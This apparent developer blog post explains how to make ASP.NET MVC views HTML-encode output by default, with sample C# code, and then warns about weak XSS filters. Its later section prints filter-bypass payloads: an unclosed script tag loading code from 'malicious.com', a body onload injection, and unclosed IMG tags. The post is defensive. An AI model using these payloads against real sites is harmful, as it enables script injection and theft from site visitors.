ASP.NET MVC: Prevent XSS with automatic HTML encoding

There’s an interesting (and sometimes heated) debate on the ASP.NET MVC forums about HTML encoding.

It started with a proposal for a helper method to HTML-encode strings as soon as they are received from the visitor, so they’d be stored HTML-encoded in the database. That way, you don’t have to HTML-encode them for display to prevent cross-site scripting. If that was the default behaviour for the UpdateFrom() method, the idea of encoding for storage would no doubt be widely adopted.

Almost everyone else on the forum, though, has a strong preference for not encoding anything until the moment of display. There are some obvious benefits to this approach - you don’t have to remember which strings were pre-encoded (according to their origin), and you don’t have to un-encode them when outputting to any non-HTML format. But it does mean you have to remember to encode things wherever you output them.

Sadly the two methods are incompatible, and you will have to choose one side or the other. I am very definitely in the encode-when-displaying camp.

Another solution

What I’d really like is to change the default behaviour of ASPX’s <%= … %> syntax so that it HTML-encodes the result by default. That’s what you want 95% of the time, so why should you keep writing <%= HttpUtility.HtmlEncode(…) %> all the time?

                          Current reality                         In my ideal world
Output unencoded string   <%= value %>                            <%= (RawHtml) value %>
Output encoded string     <%= HttpUtility.HtmlEncode(value) %>    <%= … %>

This would give us the best of both worlds. You wouldn’t need to remember to HTML-encode your strings (since that happens by default), so there’d be no need to store things pre-encoded in the database and then worry about double-escaping, sharing data with external systems, unencoding for output to non-HTML format and all that other nonsense.

Spike implementation

It’s a great credit to the ASP.NET architecture that we can actually implement that change of behaviour ourselves, and with not much code either. The idea is to intercept the code generation phase that happens when an ASPX file is compiled.

You can specify your own compiler implementation by editing this section of the web.config:

<system.codedom>
   <compilers>
      <compiler language="c#;cs;csharp" type="Microsoft.CSharp.CSharpCodeProvider .. etc" extension=".cs" warningLevel="4" />
   </compilers>
</system.codedom>

… and, helpfully, you can subclass CSharpCodeProvider, override the GenerateCodeFromStatement() method, and redirect all the <%= … %> evaluations through a suitable helper function.
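As a rough sketch of that idea (not the actual SafeEncodingHelper source), a provider along these lines could do the wrapping. It assumes that a <%= … %> block arrives as a Write(...) call whose single argument is a raw code snippet; that shape is my assumption about what the page compiler emits. The helper name SafeEncodingHelper.Encoder.HtmlEncode is hypothetical too, and appears here only as text spliced into the generated code.

```csharp
using System.CodeDom;
using System.CodeDom.Compiler;
using System.IO;
using Microsoft.CSharp;

namespace SafeEncodingHelper
{
    // Sketch: a C# code provider that wraps <%= ... %> expressions in an encoding call.
    public class SafeEncodingCSharpCodeProvider : CSharpCodeProvider
    {
        // Hypothetical helper; it only needs to exist when the generated page code compiles.
        private const string WrapperPrefix = "SafeEncodingHelper.Encoder.HtmlEncode(";

        public override void GenerateCodeFromStatement(
            CodeStatement statement, TextWriter writer, CodeGeneratorOptions options)
        {
            // Assumption: <%= expr %> reaches us as "someWriter.Write(expr)",
            // with expr held as a CodeSnippetExpression.
            CodeExpressionStatement expressionStatement = statement as CodeExpressionStatement;
            if (expressionStatement != null)
            {
                CodeMethodInvokeExpression call =
                    expressionStatement.Expression as CodeMethodInvokeExpression;
                if (call != null
                    && call.Method.MethodName == "Write"
                    && call.Parameters.Count == 1)
                {
                    CodeSnippetExpression snippet = call.Parameters[0] as CodeSnippetExpression;
                    if (snippet != null && !string.IsNullOrEmpty(snippet.Value))
                    {
                        // Note: this mutates the statement in place, so generating the
                        // same statement twice would wrap (and encode) it twice.
                        snippet.Value = WrapperPrefix + snippet.Value + ")";
                    }
                }
            }

            // Let the standard C# generator emit the (possibly rewritten) statement.
            base.GenerateCodeFromStatement(statement, writer, options);
        }
    }
}
```

Any statement that doesn’t match that shape passes through untouched, so ordinary code-behind and <% … %> blocks should be unaffected.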

Demonstration

You can download a demonstration project to see this in action. To install the behaviour into your own project, follow these steps:

1. Download the SafeEncodingHelper assembly (or build it yourself - the demo project includes sources), and add a reference to it in your project.

2. In your web.config, edit the system.codedom.compilers element, to look like this:

<compiler language="c#;cs;csharp" type="SafeEncodingHelper.SafeEncodingCSharpCodeProvider, SafeEncodingHelper" extension=".cs" warningLevel="4">
	<providerOption value="v3.5" name="CompilerVersion" />
	<providerOption value="false" name="WarnAsError" />
</compiler>

3. Also in web.config, under pages/namespaces, add a reference to the SafeEncodingHelper namespace:

<namespaces>
	<add namespace="System.Web.Mvc" />
	<add namespace="System.Linq" />
	<add namespace="SafeEncodingHelper" />
</namespaces>

 

That’s all! You will now find that <%=…%> encodes its output, or you can get unencoded output by casting your value to the RawHtml type, i.e. <%= (RawHtml)myValue %>.

What about MVCToolkit?

You might be thinking that this is going to break the MVC toolkit, since you use it to build HTML controls with a syntax like this:

<%= Html.TextBox("myinput", "It's nice") %>

You might, reasonably, expect this now to render a bunch of useless HTML-encoded nonsense. There’s a neat solution, though - the MVC toolkit could return values of the RawHtml type (which is merely a wrapper around System.String which adds no functionality). This is specially recognised by the SafeEncodingHelper compiler, and bypasses the HTML encoding. So, you can keep your clean syntax for any methods that you specifically want to render unencoded HTML.

Also, if someone isn’t using SafeEncodingHelper, no problem! The RawHtml type has a .ToString() method that simply returns the underlying value, so the MVC toolkit methods would still work just as well.
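To make that concrete, here’s a minimal sketch of how the pieces might fit together. It is an illustration only, not the code from the demonstration project: the Encoder class, its HtmlEncode method and the SketchHtml.TextBox helper are hypothetical names, and RawHtml is written the way the text describes it (a thin wrapper around a string, with an explicit cast from string).

```csharp
using System.Web;

namespace SafeEncodingHelper
{
    // Thin wrapper that marks a string as "already safe HTML, don't encode".
    public sealed class RawHtml
    {
        private readonly string value;

        public RawHtml(string value) { this.value = value; }

        // Allows <%= (RawHtml)myValue %>.
        public static explicit operator RawHtml(string value)
        {
            return new RawHtml(value);
        }

        // Without the custom compiler, Write() just sees the underlying string.
        public override string ToString()
        {
            return value ?? string.Empty;
        }
    }

    // Hypothetical helper that every <%= ... %> expression is routed through.
    public static class Encoder
    {
        public static string HtmlEncode(object value)
        {
            if (value == null) return string.Empty;
            if (value is RawHtml) return value.ToString();    // bypass encoding
            return HttpUtility.HtmlEncode(value.ToString());  // encode everything else
        }
    }

    // Hypothetical stand-in for a toolkit method that returns markup.
    public static class SketchHtml
    {
        public static RawHtml TextBox(string name, string value)
        {
            // Attribute values are still encoded; only the tag itself is raw.
            return new RawHtml(
                "<input type=\"text\" name=\"" + HttpUtility.HtmlAttributeEncode(name)
                + "\" value=\"" + HttpUtility.HtmlAttributeEncode(value) + "\" />");
        }
    }
}
```

With something like this in place, Encoder.HtmlEncode("<b>") would give &lt;b&gt;, while Encoder.HtmlEncode(SketchHtml.TextBox("myinput", "hello")) would return the input tag untouched.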

The demonstration project contains an alternative MVC toolkit that behaves this way. Actually, it only has a single facility (TextBox), but it’s enough to give you the idea.

Should I really use this then?

Firstly, this code comes with no warranties at all. Use it if you want, but beware - I just cooked it up on impulse and there may be any number of special cases I haven’t accounted for. It’s a proof of concept, that’s all.

Unless Microsoft chooses to support the RawHtml type in their MVC toolkit and related methods, you would have to remember to cast all MVC toolkit output to RawHtml, or write your own wrapper methods or something. Not much fun, sorry.

Check your XSS filters (Cross-site scripting)

In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither was effectively protected against this:

<script src="http://malicious.com/script.js"

Agh! All I did was remove the tag’s closing “>” character and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.

If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically preventing the string “<script”, I could have written this:

<body onload="alert('I am evil script'); doEvilStuff();"

Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.

One of the applications was supposed to filter out all HTML, full stop. Putting images in this supposed plain text was, of course, easy - just miss off the closing bracket of the <IMG> tag.
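I don’t know how either application implemented its filter, but here’s a sketch of the kind of tag-stripping code that fails in exactly this way. The pattern is a hypothetical example of a naive filter: it only matches text that runs from “<” to a closing “>”, so an unclosed tag is never seen as a tag at all.

```csharp
using System;
using System.Text.RegularExpressions;

public static class NaiveFilterDemo
{
    // Hypothetical naive filter: removes anything that looks like a complete <...> tag.
    public static string StripTags(string input)
    {
        return Regex.Replace(input, "<[^>]*>", string.Empty);
    }

    public static void Main()
    {
        string closed = "<script src=\"http://malicious.com/script.js\"></script>";
        string unclosed = "<script src=\"http://malicious.com/script.js\"";

        // Both complete tags are removed, leaving an empty string.
        Console.WriteLine(StripTags(closed).Length);          // prints 0

        // No ">" anywhere, so nothing matches and the payload survives intact.
        Console.WriteLine(StripTags(unclosed) == unclosed);   // prints True
    }
}
```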

Rolling your own HTML filter

HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.

If you can get away with simply HTML-encoding *all* user input at the point of display, do that - it’s easy and very safe, like this:

MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);
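As a quick illustration of why this is safe even against malformed tags, here’s what encoding does to an unclosed script tag. The EncodeDemo class and Render method are just names made up for this sketch.

```csharp
using System;
using System.Web;

public static class EncodeDemo
{
    // Encode at the point of display, whatever the string contains.
    public static string Render(string suspiciousString)
    {
        return HttpUtility.HtmlEncode(suspiciousString);
    }

    public static void Main()
    {
        // The "<" and the quotes are turned into entities, so the browser
        // shows the text instead of treating it as markup.
        Console.WriteLine(Render("<script src=\"http://malicious.com/script.js\""));
        // prints: &lt;script src=&quot;http://malicious.com/script.js&quot;
    }
}
```

Encoding doesn’t need to recognise tags at all, which is why a missing “>” makes no difference to it.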

If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.

If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text - or whitelisted markup - from any string claiming to be HTML.

Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.
